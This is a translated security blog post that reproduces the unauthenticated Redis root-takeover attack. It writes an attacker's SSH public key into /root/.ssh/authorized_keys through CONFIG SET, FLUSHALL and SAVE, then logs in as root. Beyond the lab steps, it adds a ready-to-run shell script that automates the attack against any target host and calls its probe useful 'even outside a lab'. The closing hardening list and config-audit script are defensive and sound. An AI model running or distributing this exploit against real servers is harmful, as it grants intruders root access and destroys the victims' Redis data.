神刀安全网

[Original] Reproducing the Redis crackit vulnerability step by step

1. Install Redis on two test machines: one is the attacker (it uses its local redis-cli to log in to the remote redis-server), the other is the victim (it runs redis-server).

    [root@test-hadoop-s1 ~]# yum install redis -y
    [root@test-hadoop-s2 ~]# yum install redis -y

2. Edit the Redis configuration on test-hadoop-s1 so that Redis accepts connections from any IP address (if it only accepted local connections, a remote attack would be out of the question) and so that Redis can be used without a password (this is another precondition for the attack; with a sufficiently strong password set, the attack is effectively prevented).

    [root@test-hadoop-s1 ~]# vim /etc/redis.conf
    bind 0.0.0.0

Leave the following line commented out (it is commented out by default):

    # requirepass foobared

3. Start Redis as root. If it is started with /etc/init.d/redis start or service redis start, it runs as the redis user (a nologin account), which has no permission on /root/.ssh and cannot write anything there, so the later destructive step would fail.

    [root@test-hadoop-s1 ~]# sudo redis-server /etc/redis.conf

4. Neither test-hadoop-s1 nor test-hadoop-s2 has a firewall configured, so test-hadoop-s2 can reach the redis-server on test-hadoop-s1. With a firewall that only lets specific hosts connect, the attack can also be effectively prevented.

    [root@test-hadoop-s1 ~]# iptables -L -nv
    Chain INPUT (policy ACCEPT 32M packets, 26G bytes)
     pkts bytes target     prot opt in     out     source               destination

    Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
     pkts bytes target     prot opt in     out     source               destination

    Chain OUTPUT (policy ACCEPT 34M packets, 25G bytes)
     pkts bytes target     prot opt in     out     source               destination

    [root@test-hadoop-s2 ~]# iptables -L -nv
    Chain INPUT (policy ACCEPT 86M packets, 61G bytes)
     pkts bytes target     prot opt in     out     source               destination

    Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
     pkts bytes target     prot opt in     out     source               destination

    Chain OUTPUT (policy ACCEPT 84M packets, 71G bytes)
     pkts bytes target     prot opt in     out     source               destination

5. Check that the Redis on test-hadoop-s1 is reachable from test-hadoop-s2:

    [root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379
    redis test-hadoop-s1:6379>

Remote connectivity can also be tested with telnet; the server answers the raw protocol directly (a bulk-string reply for echo, +OK for quit):

    [root@test-hadoop-s2 ~]# telnet test-hadoop-s1 6379
    Trying 10.104.154.155...
    Connected to test-hadoop-s1.
    Escape character is '^]'.
    echo "hello"
    $7
    "hello"
    quit
    +OK
    Connection closed by foreign host.

6. On test-hadoop-s2, generate a public/private key pair, saved as /root/.ssh/id_rsa.pub and /root/.ssh/id_rsa.

    [root@test-hadoop-s2 ~]# ssh-keygen -C "redis_crack@redis.io"
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa):
    /root/.ssh/id_rsa already exists.
    Overwrite (y/n)? y
    Enter passphrase (empty for no passphrase):
    Enter same passphrase again:
    Your identification has been saved in /root/.ssh/id_rsa.
    Your public key has been saved in /root/.ssh/id_rsa.pub.
    The key fingerprint is:
    3e:69:20:d1:bb:ee:dc:cc:30:7b:da:6e:90:e0:35:0b redis_crack@redis.io
    The key's randomart image is:
    +--[ RSA 2048]----+
    |                 |
    |     .           |
    |    . .          |
    |    E.o.         |
    |   ..+o+S        |
    |    ..++ .       |
    |      +.=        |
    |     o Xo.       |
    |     .*=*        |
    +-----------------+

7. Since this is purely a test, first back up the existing authorized_keys file on test-hadoop-s1 so it can be restored afterwards.

    [root@test-hadoop-s1 ~]# cd .ssh/
    [root@test-hadoop-s1 .ssh]# ll
    total 16
    -rw-r--r-- 1 root root 2003 Mar  2 16:25 authorized_keys
    -rw------- 1 root root 1675 Mar  2 16:20 id_rsa
    -rw-r--r-- 1 root root  401 Mar  2 16:20 id_rsa.pub
    -rw-r--r-- 1 root root 2403 Apr  6 13:13 known_hosts
    [root@test-hadoop-s1 .ssh]# mv authorized_keys authorized_keys_bak

8. From test-hadoop-s2, reconfigure the Redis persistence directory and dump file name at runtime with CONFIG SET (no access to the config file is needed): the directory becomes /root/.ssh, where the SSH keys live, and the dump file name becomes authorized_keys.

    [root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379
    redis test-hadoop-s1:6379> config set dir /root/.ssh
    OK
    redis test-hadoop-s1:6379> config set dbfilename "authorized_keys"
    OK

9. From test-hadoop-s2, connect to the Redis on test-hadoop-s1, flush all databases (so the dump contains nothing but our key), write test-hadoop-s2's public key into the key crackit, and persist it to the dump file with SAVE. The blank lines on either side of the key keep it on a line of its own inside the binary RDB data; sshd skips the lines it cannot parse and accepts the key line.

    [root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 flushall
    OK
    [root@test-hadoop-s2 ~]# (echo -e '\n'; cat /root/.ssh/id_rsa.pub; echo -e '\n') | redis-cli -h test-hadoop-s1 -p 6379 -x set crackit
    OK
    [root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 save
    OK

With that, test-hadoop-s2's public key has been written into /root/.ssh/authorized_keys on test-hadoop-s1, and test-hadoop-s2 can log in to test-hadoop-s1 without a password.

10. Test the connection by logging in over ssh with the private key:

    [root@test-hadoop-s2 ~]# ssh -i /root/.ssh/id_rsa root@test-hadoop-s1
    Last login: Tue Apr 19 16:17:38 2016 from 10.104.142.115
    [root@test-hadoop-s1 ~]#

And that's it: you can now do whatever you like as root!!!
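Steps 8 to 10 as one script, added here as an example (this is not code from the original post). It assumes redis-cli and ssh on the attacking machine, takes the target as REDIS_TARGET=host[:port], and adds two checks the manual run above does not have: a pre-flight test that CONFIG works without AUTH (if a password is set or CONFIG has been renamed, the target is simply not exploitable this way and nothing is touched), and a check that the planted key really ended up on a line of its own inside the RDB-polluted file. The helper names and the key name crackit are my choices.

```shell
#!/bin/sh
# Added example, not code from the original post: steps 8-10 as a script.
# Assumed: redis-cli and ssh are installed here, the target is given as
# REDIS_TARGET=host[:port], and our key pair is /root/.ssh/id_rsa{,.pub}.

# Wrap a public key in blank lines. Redis writes a binary RDB file around the
# value, so the key must sit on a line of its own for sshd to parse it; sshd
# skips the unparsable binary lines before and after.
build_payload() {            # $1 = path to id_rsa.pub
    printf '\n\n%s\n\n' "$(cat "$1")"
}

# After SAVE, verify the key is present as an exact line in the (now binary)
# authorized_keys file. grep -a treats the file as text; -F -x require a
# whole-line literal match. Returns 0 if found, 1 otherwise.
key_in_file() {              # $1 = authorized_keys path, $2 = id_rsa.pub path
    grep -a -F -x -q -- "$(cat "$2")" "$1"
}

# Pre-flight: can we run CONFIG without AUTH? Prints the current dir (the value
# we are about to overwrite). Fails if the server wants a password or CONFIG
# has been renamed away (the rename-command defence), so nothing is touched.
probe_target() {             # $1 = host, $2 = port
    out=$(redis-cli -h "$1" -p "$2" config get dir 2>&1) || return 1
    case "$out" in
        *NOAUTH*|*"unknown command"*|*ERR*) return 1 ;;
    esac
    printf '%s\n' "$out"
}

# Steps 8 and 9: point the dump at /root/.ssh/authorized_keys, empty the
# database so the dump holds nothing but our key, store the key, SAVE.
plant_key() {                # $1 = host, $2 = port, $3 = id_rsa.pub path
    cli="redis-cli -h $1 -p $2"   # split on spaces on purpose
    $cli config set dir /root/.ssh
    $cli config set dbfilename authorized_keys
    $cli flushall
    build_payload "$3" | $cli -x set crackit
    $cli save
}

# Step 10: log in with the private key and confirm from the inside that the
# key line survived inside the RDB file.
verify_login() {             # $1 = host
    ssh -i /root/.ssh/id_rsa "root@$1" \
        'id; grep -a -c "^ssh-rsa " /root/.ssh/authorized_keys'
}

# The network part only runs when a target is given, so the helpers above can
# be sourced and tested on their own.
if [ -n "${REDIS_TARGET:-}" ]; then
    host=${REDIS_TARGET%%:*}
    port=${REDIS_TARGET##*:}
    [ "$port" = "$REDIS_TARGET" ] && port=6379
    probe_target "$host" "$port" || { echo "CONFIG refused: not exploitable this way"; exit 1; }
    plant_key "$host" "$port" /root/.ssh/id_rsa.pub
    verify_login "$host"
fi
```

Run it as `REDIS_TARGET=test-hadoop-s1 sh crackit.sh`. The probe is worth keeping even outside a lab: a target that answers NOAUTH or "unknown command" to CONFIG is one where this whole path is closed, and there is no point flushing its data first.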

Reproducing the vulnerability shows exactly how to avoid being attacked. Defend along the following lines:

  • Run the Redis service as the redis user, never as root
  • Set a strong password for Redis (requirepass); never leave it empty, weak, or at a default value
  • Restrict where Redis listens, e.g. bind 127.0.0.1 or an internal address, rather than 0.0.0.0 for all hosts
  • Change the default port 6379
  • Disable or rename dangerous commands such as flushall and config (rename-command in redis.conf)
  • Put a solid firewall in front of the host running Redis
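A check for the configuration side of this list, added here as an example and not taken from the original post: a POSIX shell audit of a redis.conf that flags each weakness the attack above relied on (bind on all interfaces, no or short requirepass, default port, CONFIG and FLUSHALL still enabled). The 16-character password threshold and the function names are my choices; whether the server runs as root is a property of the process, not of the file, and has to be checked on the host with ps.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a redis.conf for the
# weaknesses the attack above needed. Assumed: standard redis.conf syntax
# ("directive value", "#" comments); the 16-character password threshold and
# the function names are my choices. Running as root is a property of the
# process, not the file: check that with "ps -o user= -C redis-server".

# Effective value of a directive: the last uncommented occurrence wins, as in
# Redis itself. Prints an empty string if the directive is not set.
conf_get() {                 # $1 = redis.conf path, $2 = directive
    awk -v k="$2" '$1 == k { $1 = ""; sub(/^ /, ""); v = $0 } END { print v }' "$1"
}

# Is a command renamed (or disabled with an empty name) via rename-command?
# Command names are case-insensitive in Redis, so compare upper-cased.
has_rename() {               # $1 = redis.conf path, $2 = command name
    awk -v c="$(printf '%s' "$2" | tr '[:lower:]' '[:upper:]')" \
        'toupper($1) == "RENAME-COMMAND" && toupper($2) == c { found = 1 }
         END { exit !found }' "$1"
}

# Print one line per finding; prints nothing for a hardened file.
audit_redis_conf() {         # $1 = redis.conf path
    bind=$(conf_get "$1" bind)
    case "$bind" in
        ""|*0.0.0.0*)
            echo "bind: ${bind:-unset}, reachable from every host (bind 127.0.0.1 or an internal address)" ;;
    esac

    pass=$(conf_get "$1" requirepass)
    if [ -z "$pass" ]; then
        echo "requirepass: unset, anyone who can reach the port is a full client"
    elif [ "${#pass}" -lt 16 ]; then
        echo "requirepass: only ${#pass} characters; Redis does not rate-limit AUTH, so use a long random one"
    fi

    port=$(conf_get "$1" port)
    if [ -z "$port" ] || [ "$port" = 6379 ]; then
        echo "port: default 6379, the first port every scanner tries"
    fi

    for cmd in CONFIG FLUSHALL; do
        has_rename "$1" "$cmd" ||
            echo "rename-command: $cmd still available (rename-command $cmd \"\" disables it)"
    done
}

if [ -n "${1:-}" ]; then
    audit_redis_conf "$1"
fi
```

Run `sh audit.sh /etc/redis.conf`; an empty output means none of the checked weaknesses is present. Note that a missing bind line is flagged on purpose: in the Redis versions the write-up uses, no bind directive means the server listens on every interface, which is the same exposure as bind 0.0.0.0.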
